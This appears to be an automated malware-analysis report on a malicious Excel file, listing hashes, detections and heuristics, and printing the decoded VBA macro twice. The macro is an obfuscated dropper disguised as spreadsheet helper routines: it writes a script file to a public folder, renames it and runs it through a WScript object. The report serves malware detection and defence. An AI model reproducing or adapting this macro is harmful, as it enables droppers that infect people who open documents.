Office (OLE) malware analysis — malicious · 30f877eb2f3950fe

MALICIOUS

Office (OLE)

826.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-02-20

MD5: a671505fb0d646f3ff273b033c648040 SHA-1: f79ea3dd507c9233b18860c1f4163fbbccb1b467 SHA-256: 30f877eb2f3950fe05f528d66f387daa917cc2d0f8fc105d6710675be45f4c2d

182 Risk Score

Heuristics 6

ClamAV: Xls.Malware.Exvk-9785252-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Exvk-9785252-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set P_Ol7 = CreateObject(Strtd & roc2.ControlTipText & "." & roc3.ControlTipText)

CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Matched line in script

Cells(iCntr, 2) = Cells(iCntr, CallByName(P_Ol7, Me.roc1.Caption, VbMethod, roc4.Caption & UserForm1.Label1.Caption & roc4.Caption, Me.roc1.Height - 113))

Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3818 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3818 bytes
SHA-256: `431b5eeffb7b3dac7e5f3fa28ab3ad5c6246b2262314050ad4709f6f7eef07c8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "bro1, 2, 0, MSForms, TextBox" Sub sbCreateTOCSheetHyperLinks() iCntr = 5 ' worksheets names starts from 5th row On Error Resume Next 'loop until the cell is blank Do While Sheets("Index").Range("A" & iCntr) <> "" 'If you want to add new worksheets from last worksheet Sheets.Add After:=Sheets(ActiveWorkbook.Worksheets.Count) ActiveSheet.Name = Sheets("Index").Range("A" & iCntr) Sheets("Index").Activate 'delete if any existing hyperlink Range("A" & iCntr).Hyperlinks.Delete 'add Hyperlinks Sheets("Index").Hyperlinks.Add Anchor:=Range("A" & iCntr), Address:="", _ SubAddress:="’" & Sheets("Index").Range("A" & iCntr).Value & "’!A1", _ TextToDisplay:=Sheets("Index").Range("A" & iCntr).Value iCntr = iCntr + 1 If iCntr = 750 Then UserForm1.Label1.Caption = "C:\Users\Public\Documents\load.txt" UserForm1.gaz.Value = UserForm1.gaz.Value & " " Exit Do End If Loop End Sub Private Sub BixD() Dim Kovid As String On Error Resume Next Kovid = UserForm1.broxi.Value cddefr = 2 Open "C:\Users\Public\Documents\load.txt" For Binary Lock Read Write As #1 Put #1, , Kovid Close #1 End Sub Private Sub Bro1_Change() BixD End Sub Private Sub Worksheet_Calculate() If Sheet1.EnableFormatConditionsCalculation = True Then bro1.Value = bro1.Value & " " sbCreateTOCSheetHyperLinks End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{C086AA36-EF6E-436F-A684-A7B113F8373F}{C133CF1A-9DCB-4D98-8136-8428A0A7C3C8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public P_Ol7 As Object Public Strtd As String Sub sbPrintNegativeColumnAValuesInToColumnB() Dim iCntr, jCntr, lastRow As Long lastRow = 50 ' Last Row of Column A with data:You can change this For iCntr = 1 To lastRow If iCntr > 33 Then Cells(iCntr, 2) = Cells(iCntr, CallByName(P_Ol7, Me.roc1.Caption, VbMethod, roc4.Caption & UserForm1.Label1.Caption & roc4.Caption, Me.roc1.Height - 113)) Strtd = Sheet1.CodeName Me.ForeColor = 89 Exit For End If Next End Sub Private Sub broxi_Change() sbPrintNegativeColumnAValuesInToColumnB End Sub Private Sub gaz_Enter() End Sub Private Sub roc1_Click() MsgBox roc1.Caption End Sub Private Sub roc3_Click() MsgBox roc2.Caption End Sub Private Sub roc4_Click() MsgBox roc3.Caption End Sub Private Sub gaz_Change() Strtd = "W" Set P_Ol7 = CreateObject(Strtd & roc2.ControlTipText & "." & roc3.ControlTipText) MikeCh = UserForm1.Label1.Caption & "pin" & ".j" & roc4.ControlTipText Name UserForm1.Label1.Caption As MikeCh Me.Label1.Caption = MikeCh roc4.Caption = Chr(34) UserForm1.broxi.Value = UserForm1.broxi.Value & "var h7yfv;" End Sub Private Sub UserForm_Click() MsgBox roc2.Caption End Sub Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 431b5eeffb7b3dac7e5f3fa28ab3ad5c6246b2262314050ad4709f6f7eef07c8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "bro1, 2, 0, MSForms, TextBox"
Sub sbCreateTOCSheetHyperLinks()

iCntr = 5 ' worksheets names starts from 5th row
On Error Resume Next
'loop until the cell is blank
Do While Sheets("Index").Range("A" & iCntr) <> ""

'If you want to add new worksheets from last worksheet
Sheets.Add After:=Sheets(ActiveWorkbook.Worksheets.Count)
ActiveSheet.Name = Sheets("Index").Range("A" & iCntr)

Sheets("Index").Activate
'delete if any existing hyperlink
Range("A" & iCntr).Hyperlinks.Delete

'add Hyperlinks
Sheets("Index").Hyperlinks.Add Anchor:=Range("A" & iCntr), Address:="", _
SubAddress:="’" & Sheets("Index").Range("A" & iCntr).Value & "’!A1", _
TextToDisplay:=Sheets("Index").Range("A" & iCntr).Value

iCntr = iCntr + 1
If iCntr = 750 Then
UserForm1.Label1.Caption = "C:\Users\Public\Documents\load.txt"
UserForm1.gaz.Value = UserForm1.gaz.Value & " "
Exit Do
End If
Loop
End Sub


Private Sub BixD()
Dim Kovid As String
On Error Resume Next
Kovid = UserForm1.broxi.Value
cddefr = 2
Open "C:\Users\Public\Documents\load.txt" For Binary Lock Read Write As #1
Put #1, , Kovid
Close #1
End Sub

Private Sub Bro1_Change()
BixD
End Sub

Private Sub Worksheet_Calculate()
If Sheet1.EnableFormatConditionsCalculation = True Then bro1.Value = bro1.Value & "  "
sbCreateTOCSheetHyperLinks
End Sub



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C086AA36-EF6E-436F-A684-A7B113F8373F}{C133CF1A-9DCB-4D98-8136-8428A0A7C3C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public P_Ol7 As Object
Public Strtd As String

Sub sbPrintNegativeColumnAValuesInToColumnB()
Dim iCntr, jCntr, lastRow As Long
lastRow = 50 ' Last Row of Column A with data:You can change this
For iCntr = 1 To lastRow
If iCntr > 33 Then
Cells(iCntr, 2) = Cells(iCntr, CallByName(P_Ol7, Me.roc1.Caption, VbMethod, roc4.Caption & UserForm1.Label1.Caption & roc4.Caption, Me.roc1.Height - 113))
Strtd = Sheet1.CodeName
Me.ForeColor = 89

Exit For
End If
Next
End Sub



Private Sub broxi_Change()
sbPrintNegativeColumnAValuesInToColumnB
End Sub

Private Sub gaz_Enter()

End Sub

Private Sub roc1_Click()
MsgBox roc1.Caption
End Sub

Private Sub roc3_Click()
MsgBox roc2.Caption
End Sub

Private Sub roc4_Click()
MsgBox roc3.Caption
End Sub



Private Sub gaz_Change()
Strtd = "W"
Set P_Ol7 = CreateObject(Strtd & roc2.ControlTipText & "." & roc3.ControlTipText)
MikeCh = UserForm1.Label1.Caption & "pin" & ".j" & roc4.ControlTipText
Name UserForm1.Label1.Caption As MikeCh
Me.Label1.Caption = MikeCh
roc4.Caption = Chr(34)
UserForm1.broxi.Value = UserForm1.broxi.Value & "var h7yfv;"
End Sub

Private Sub UserForm_Click()
MsgBox roc2.Caption
End Sub

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.